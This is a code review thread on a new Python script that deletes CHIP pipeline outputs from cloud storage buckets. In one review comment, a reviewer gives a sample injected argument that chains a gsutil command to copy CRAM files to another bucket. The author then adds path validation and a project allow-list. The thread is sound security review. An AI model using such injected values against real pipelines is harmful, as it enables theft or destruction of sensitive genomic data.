scripts/cpg_cromwell/remove_analysis_outs.py

```diff
@@ -0,0 +1,28 @@
+"""
+Remove the CHIP pipeline outputs from the release bucket once no longer needed
+"""
+import hailtop.batch as hb
+from cpg_utils.config import get_config
+from cpg_utils.hail_batch import remote_tmpdir, get_batch
+
+import re
+
+_config = get_config()
+DATASET = _config['workflow']['dataset']
+JOB_NAME = _config['workflow']['name']
+WORKFLOW_NAME = _config['workflow']['workflow_name']
+RUN_ID = _config['workflow']['run_id']
+OUTPUT_PREFIX = f'{JOB_NAME}/{WORKFLOW_NAME}/{RUN_ID}'
+CROMWELL_OUTPUT_PREFIX = f'mutect2-chip/{OUTPUT_PREFIX}'
+CROMWELL_OUTPUT_BUCKET = _config['storage'][DATASET]['default']
+# OUTPUT_BUCKET = _config['storage'][DATASET]['release']  # Currently no 'release' key in config TOML
+OUTPUT_BUCKET = re.sub(r'\-main$', '-release', CROMWELL_OUTPUT_BUCKET)
+OUTPUT_PATH = f'{OUTPUT_BUCKET}/{CROMWELL_OUTPUT_PREFIX}'
```

Comment:
Security wise, this is prone to injection attacks, say the output prefix:

```
--output-dir '; gsutil cp gs://cpg-<dataset>-main/crams/ gs://other-bucket'
```

You'll delete everything in the bucket, with no recourse to restore because `rm -r` deletes all versions.

Reply:
Very good point, apologies for the oversight. I'll get onto fixing that this afternoon.

Reply:
@illusional I've made a few changes to the code to restrict all the final paths to the regex `^gs://[A-Za-z0-9\-_\/\.]+$`. That should ensure that no commands can be injected into the paths. I've also added a list of valid projects so the buckets being worked on can only be in that list. Right now that just includes kccg-genomics-med. Any new projects will need a code review to update these scripts.

Reply:
Amazing, thanks @mgeaghan!